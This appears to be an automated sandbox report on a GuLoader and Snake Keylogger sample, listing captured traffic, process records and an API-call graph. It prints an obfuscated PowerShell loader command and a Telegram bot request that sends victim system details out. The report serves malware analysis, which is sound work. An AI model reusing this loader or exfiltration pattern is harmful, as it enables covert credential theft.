                                                            2024-09-25 14:01:34 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:34 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.8 | 49723 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:36 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:36 UTC | 674 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:36 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24955
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IU4zTsace5To79PjzTSGATUJ1ESHEUamlhDB9rT8G71AGdj15ste1bVxIxy2R6OuonY93L8Fxer2CuYKOE0gm8Pj1aWa8cAp%2F93miuYMg%2BVRVhpMLPIhtTgUf1JcneYemb3TT9mS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c10be4d42af-EWR
                                                            2024-09-25 14:01:36 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:36 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.8 | 49725 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:37 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:37 UTC | 690 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:37 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24956
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQNJTu803U9M6hK7MWnpondUN%2BD7Uq1hQrgNSNzHIDmtRsTXKYiZXlfRph7q%2BxKuJDg2fzqddN%2FNfe%2BvwAZB%2BwaW8l75ObgPNfHVJqlo6h0G2MdIpAHTNxX%2FrO1fwX2S%2F%2Fxj%2Ffc%2B"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c1a49c80c80-EWR
                                                            2024-09-25 14:01:37 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:37 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.8 | 49727 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:38 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-09-25 14:01:39 UTC | 682 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:39 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24957
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eymueM0mbmMO9igrj3UtcWXmtle%2BZBtDtoIymyPb1YTi3QQkl1QSJE1IN66HVmUK5sij%2BrBdsdf0mxvfAELkt6eI%2FYL7PFXNuuK%2BdGkxC0%2BNgpsGi%2F4FbWfWJhnhQruOU2rqHTTL"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c22af1f8c1b-EWR
                                                            2024-09-25 14:01:39 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:39 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.8 | 49729 | 188.114.97.3 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:40 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:40 UTC | 674 | IN | HTTP/1.1 200 OK
                                                            Date: Wed, 25 Sep 2024 14:01:40 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 24959
                                                            Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q7R1sQlIRtrqi52t6jYg83uRmyeiKkL9e0I3V1bT3fVHPAMnD%2BsbcmGylqoIU5c6izmgvAguwr94EeUuRasKm2zdSXQlNOOhgIctg8dIrJL4%2FQvXWEMt4Zl80Hi48eCApeONnJBg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8c8b8c2bdaff424b-EWR
                                                            2024-09-25 14:01:40 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-09-25 14:01:40 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            9 | 192.168.2.8 | 49730 | 149.154.167.220 | 443 | 8168 | C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-09-25 14:01:41 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:093954%0D%0ADate%20and%20Time:%2025/09/2024%20/%2022:55:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20093954%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-09-25 14:01:41 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Wed, 25 Sep 2024 14:01:41 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-09-25 14:01:41 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                            Target ID:0
                                                            Start time:10:00:07
                                                            Start date:25/09/2024
                                                            Path:C:\Users\user\Desktop\file.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                            Imagebase:0x400000
                                                            File size:750'104 bytes
                                                            MD5 hash:7FBB332B55F872E61C8307E0B5242287
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:10:00:08
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"powershell.exe" -windowstyle minimized "$Sprag=Get-Content 'C:\Users\user\AppData\Local\acneform\Camomiles.Bev';$Depurge=$Sprag.SubString(30781,3);.$Depurge($Sprag)"
                                                            Imagebase:0xb0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2217265751.000000000B997000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:10:00:08
                                                            Start date:25/09/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:10:01:10
                                                            Start date:25/09/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wabmig.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wabmig.exe"
                                                            Imagebase:0xd50000
                                                            File size:66'048 bytes
                                                            MD5 hash:BBC90B164F1D84DEDC1DC30F290EC5F6
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2695880589.0000000022DE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2695880589.0000000022EE5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false


                                                              Execution Graph

                                                              Execution Coverage:25.3%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:20.3%
                                                              Total number of Nodes:1460
                                                              Total number of Limit Nodes:48
                                                              execution_graph (interactive call-graph figure; its flattened node and edge listing is omitted here)
API calls 4594->4595 4596 40241b GetPrivateProfileStringW 4595->4596 4597 401ffb 4598 402dab 21 API calls 4597->4598 4599 402002 4598->4599 4600 4068b4 2 API calls 4599->4600 4601 402008 4600->4601 4602 402019 4601->4602 4604 40649e wsprintfW 4601->4604 4604->4602 4605 401b7c 4606 402dab 21 API calls 4605->4606 4607 401b83 4606->4607 4608 402d89 21 API calls 4607->4608 4609 401b8c wsprintfW 4608->4609 4610 402c2f 4609->4610 4232 405b7d ShellExecuteExW 4611 401000 4612 401037 BeginPaint GetClientRect 4611->4612 4613 40100c DefWindowProcW 4611->4613 4615 4010f3 4612->4615 4616 401179 4613->4616 4617 401073 CreateBrushIndirect FillRect DeleteObject 4615->4617 4618 4010fc 4615->4618 4617->4615 4619 401102 CreateFontIndirectW 4618->4619 4620 401167 EndPaint 4618->4620 4619->4620 4621 401112 6 API calls 4619->4621 4620->4616 4621->4620 4622 404980 4623 404990 4622->4623 4624 4049b6 4622->4624 4626 4044d6 22 API calls 4623->4626 4625 40453d 8 API calls 4624->4625 4627 4049c2 4625->4627 4628 40499d SetDlgItemTextW 4626->4628 4628->4624 4629 401680 4630 402dab 21 API calls 4629->4630 4631 401687 4630->4631 4632 402dab 21 API calls 4631->4632 4633 401690 4632->4633 4634 402dab 21 API calls 4633->4634 4635 401699 MoveFileW 4634->4635 4636 4016ac 4635->4636 4642 4016a5 4635->4642 4638 4068b4 2 API calls 4636->4638 4640 4022fb 4636->4640 4637 401423 28 API calls 4637->4640 4639 4016bb 4638->4639 4639->4640 4641 406317 40 API calls 4639->4641 4641->4642 4642->4637 4643 401503 4644 401508 4643->4644 4645 401520 4643->4645 4646 402d89 21 API calls 4644->4646 4646->4645 3299 402304 3300 402dab 21 API calls 3299->3300 3301 40230a 3300->3301 3302 402dab 21 API calls 3301->3302 3303 402313 3302->3303 3304 402dab 21 API calls 3303->3304 3305 40231c 3304->3305 3314 4068b4 FindFirstFileW 3305->3314 3308 402336 lstrlenW lstrlenW 3311 4055dc 28 API calls 3308->3311 3309 402329 3313 402331 3309->3313 3317 4055dc 3309->3317 3312 402374 SHFileOperationW 3311->3312 3312->3309 3312->3313 3315 
402325 3314->3315 3316 4068ca FindClose 3314->3316 3315->3308 3315->3309 3316->3315 3318 4055f7 3317->3318 3327 405699 3317->3327 3319 405613 lstrlenW 3318->3319 3320 406594 21 API calls 3318->3320 3321 405621 lstrlenW 3319->3321 3322 40563c 3319->3322 3320->3319 3323 405633 lstrcatW 3321->3323 3321->3327 3324 405642 SetWindowTextW 3322->3324 3325 40564f 3322->3325 3323->3322 3324->3325 3326 405655 SendMessageW SendMessageW SendMessageW 3325->3326 3325->3327 3326->3327 3327->3313 4647 401d86 4648 401d99 GetDlgItem 4647->4648 4649 401d8c 4647->4649 4651 401d93 4648->4651 4650 402d89 21 API calls 4649->4650 4650->4651 4652 401dda GetClientRect LoadImageW SendMessageW 4651->4652 4653 402dab 21 API calls 4651->4653 4655 401e38 4652->4655 4657 401e44 4652->4657 4653->4652 4656 401e3d DeleteObject 4655->4656 4655->4657 4656->4657 4658 402388 4659 40238f 4658->4659 4662 4023a2 4658->4662 4660 406594 21 API calls 4659->4660 4661 40239c 4660->4661 4663 405bb7 MessageBoxIndirectW 4661->4663 4663->4662 4664 402c0a SendMessageW 4665 402c24 InvalidateRect 4664->4665 4666 402c2f 4664->4666 4665->4666 4667 40460c lstrcpynW lstrlenW 3546 40248f 3547 402dab 21 API calls 3546->3547 3548 4024a1 3547->3548 3549 402dab 21 API calls 3548->3549 3550 4024ab 3549->3550 3563 402e3b 3550->3563 3553 4024e3 3556 4024ef 3553->3556 3557 402d89 21 API calls 3553->3557 3554 402dab 21 API calls 3559 4024d9 lstrlenW 3554->3559 3555 402933 3558 40250e RegSetValueExW 3556->3558 3567 4032b9 3556->3567 3557->3556 3561 402524 RegCloseKey 3558->3561 3559->3553 3561->3555 3564 402e56 3563->3564 3587 4063f2 3564->3587 3569 4032d2 3567->3569 3568 403300 3591 4034d4 3568->3591 3569->3568 3594 4034ea SetFilePointer 3569->3594 3573 40346d 3575 4034af 3573->3575 3580 403471 3573->3580 3574 40331d GetTickCount 3576 403457 3574->3576 3583 40336c 3574->3583 3577 4034d4 ReadFile 3575->3577 3576->3558 3577->3576 3578 4034d4 ReadFile 3578->3583 3579 4034d4 ReadFile 3579->3580 3580->3576 3580->3579 3581 4060f9 
WriteFile 3580->3581 3581->3580 3582 4033c2 GetTickCount 3582->3583 3583->3576 3583->3578 3583->3582 3584 4033e7 MulDiv wsprintfW 3583->3584 3586 4060f9 WriteFile 3583->3586 3585 4055dc 28 API calls 3584->3585 3585->3583 3586->3583 3588 406401 3587->3588 3589 4024bb 3588->3589 3590 40640c RegCreateKeyExW 3588->3590 3589->3553 3589->3554 3589->3555 3590->3589 3592 4060ca ReadFile 3591->3592 3593 40330b 3592->3593 3593->3573 3593->3574 3593->3576 3594->3568 3613 402910 3614 402dab 21 API calls 3613->3614 3615 402917 FindFirstFileW 3614->3615 3616 40293f 3615->3616 3619 40292a 3615->3619 3621 40649e wsprintfW 3616->3621 3618 402948 3622 406557 lstrcpynW 3618->3622 3621->3618 3622->3619 4668 401911 4669 401948 4668->4669 4670 402dab 21 API calls 4669->4670 4671 40194d 4670->4671 4672 405c63 71 API calls 4671->4672 4673 401956 4672->4673 4674 401491 4675 4055dc 28 API calls 4674->4675 4676 401498 4675->4676 4677 401914 4678 402dab 21 API calls 4677->4678 4679 40191b 4678->4679 4680 405bb7 MessageBoxIndirectW 4679->4680 4681 401924 4680->4681 4682 404695 4684 4046ad 4682->4684 4685 4047c7 4682->4685 4683 404831 4686 4048fb 4683->4686 4687 40483b GetDlgItem 4683->4687 4690 4044d6 22 API calls 4684->4690 4685->4683 4685->4686 4692 404802 GetDlgItem SendMessageW 4685->4692 4691 40453d 8 API calls 4686->4691 4688 404855 4687->4688 4689 4048bc 4687->4689 4688->4689 4695 40487b SendMessageW LoadCursorW SetCursor 4688->4695 4689->4686 4696 4048ce 4689->4696 4693 404714 4690->4693 4694 4048f6 4691->4694 4715 4044f8 KiUserCallbackDispatcher 4692->4715 4698 4044d6 22 API calls 4693->4698 4716 404944 4695->4716 4700 4048e4 4696->4700 4701 4048d4 SendMessageW 4696->4701 4703 404721 CheckDlgButton 4698->4703 4700->4694 4706 4048ea SendMessageW 4700->4706 4701->4700 4702 40482c 4707 404920 SendMessageW 4702->4707 4713 4044f8 KiUserCallbackDispatcher 4703->4713 4706->4694 4707->4683 4708 40473f GetDlgItem 4714 40450b SendMessageW 4708->4714 4710 404755 SendMessageW 4711 404772 
GetSysColor 4710->4711 4712 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4710->4712 4711->4712 4712->4694 4713->4708 4714->4710 4715->4702 4719 405b7d ShellExecuteExW 4716->4719 4718 4048aa LoadCursorW SetCursor 4718->4689 4719->4718 4720 402896 4721 40289d 4720->4721 4724 402bae 4720->4724 4722 402d89 21 API calls 4721->4722 4723 4028a4 4722->4723 4725 4028b3 SetFilePointer 4723->4725 4725->4724 4726 4028c3 4725->4726 4728 40649e wsprintfW 4726->4728 4728->4724 4729 401f17 4730 402dab 21 API calls 4729->4730 4731 401f1d 4730->4731 4732 402dab 21 API calls 4731->4732 4733 401f26 4732->4733 4734 402dab 21 API calls 4733->4734 4735 401f2f 4734->4735 4736 402dab 21 API calls 4735->4736 4737 401f38 4736->4737 4738 401423 28 API calls 4737->4738 4739 401f3f 4738->4739 4746 405b7d ShellExecuteExW 4739->4746 4741 402933 4742 401f87 4742->4741 4743 4069f6 5 API calls 4742->4743 4744 401fa4 CloseHandle 4743->4744 4744->4741 4746->4742 4747 402f98 4748 402fc3 4747->4748 4749 402faa SetTimer 4747->4749 4750 403018 4748->4750 4751 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4748->4751 4749->4748 4751->4750 4156 40571b 4157 4058c5 4156->4157 4158 40573c GetDlgItem GetDlgItem GetDlgItem 4156->4158 4160 4058f6 4157->4160 4161 4058ce GetDlgItem CreateThread CloseHandle 4157->4161 4202 40450b SendMessageW 4158->4202 4163 405921 4160->4163 4164 405946 4160->4164 4165 40590d ShowWindow ShowWindow 4160->4165 4161->4160 4205 4056af 5 API calls 4161->4205 4162 4057ac 4169 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4162->4169 4166 405981 4163->4166 4167 40592d 4163->4167 4168 40453d 8 API calls 4164->4168 4204 40450b SendMessageW 4165->4204 4166->4164 4178 40598f SendMessageW 4166->4178 4171 405935 4167->4171 4172 40595b ShowWindow 4167->4172 4173 405954 4168->4173 4176 405821 4169->4176 4177 405805 SendMessageW SendMessageW 4169->4177 4179 4044af SendMessageW 4171->4179 4174 40597b 4172->4174 4175 40596d 4172->4175 4181 4044af 
SendMessageW 4174->4181 4180 4055dc 28 API calls 4175->4180 4182 405834 4176->4182 4183 405826 SendMessageW 4176->4183 4177->4176 4178->4173 4184 4059a8 CreatePopupMenu 4178->4184 4179->4164 4180->4174 4181->4166 4186 4044d6 22 API calls 4182->4186 4183->4182 4185 406594 21 API calls 4184->4185 4187 4059b8 AppendMenuW 4185->4187 4188 405844 4186->4188 4189 4059d5 GetWindowRect 4187->4189 4190 4059e8 TrackPopupMenu 4187->4190 4191 405881 GetDlgItem SendMessageW 4188->4191 4192 40584d ShowWindow 4188->4192 4189->4190 4190->4173 4194 405a03 4190->4194 4191->4173 4193 4058a8 SendMessageW SendMessageW 4191->4193 4195 405870 4192->4195 4196 405863 ShowWindow 4192->4196 4193->4173 4197 405a1f SendMessageW 4194->4197 4203 40450b SendMessageW 4195->4203 4196->4195 4197->4197 4198 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4197->4198 4200 405a61 SendMessageW 4198->4200 4200->4200 4201 405a8a GlobalUnlock SetClipboardData CloseClipboard 4200->4201 4201->4173 4202->4162 4203->4191 4204->4163 4752 6ff6102d 4753 6ff61096 71 API calls 4752->4753 4754 6ff61058 4753->4754 4755 401d1c 4756 402d89 21 API calls 4755->4756 4757 401d22 IsWindow 4756->4757 4758 401a25 4757->4758 4759 404d1d 4760 404d49 4759->4760 4761 404d2d 4759->4761 4763 404d7c 4760->4763 4764 404d4f SHGetPathFromIDListW 4760->4764 4770 405b9b GetDlgItemTextW 4761->4770 4766 404d66 SendMessageW 4764->4766 4767 404d5f 4764->4767 4765 404d3a SendMessageW 4765->4760 4766->4763 4769 40140b 2 API calls 4767->4769 4769->4766 4770->4765 4771 40149e 4772 4023a2 4771->4772 4773 4014ac PostQuitMessage 4771->4773 4773->4772 3185 401ba0 3186 401bf1 3185->3186 3187 401bad 3185->3187 3189 401bf6 3186->3189 3190 401c1b GlobalAlloc 3186->3190 3188 401c36 3187->3188 3193 401bc4 3187->3193 3192 406594 21 API calls 3188->3192 3200 4023a2 3188->3200 3189->3200 3223 406557 lstrcpynW 3189->3223 3204 406594 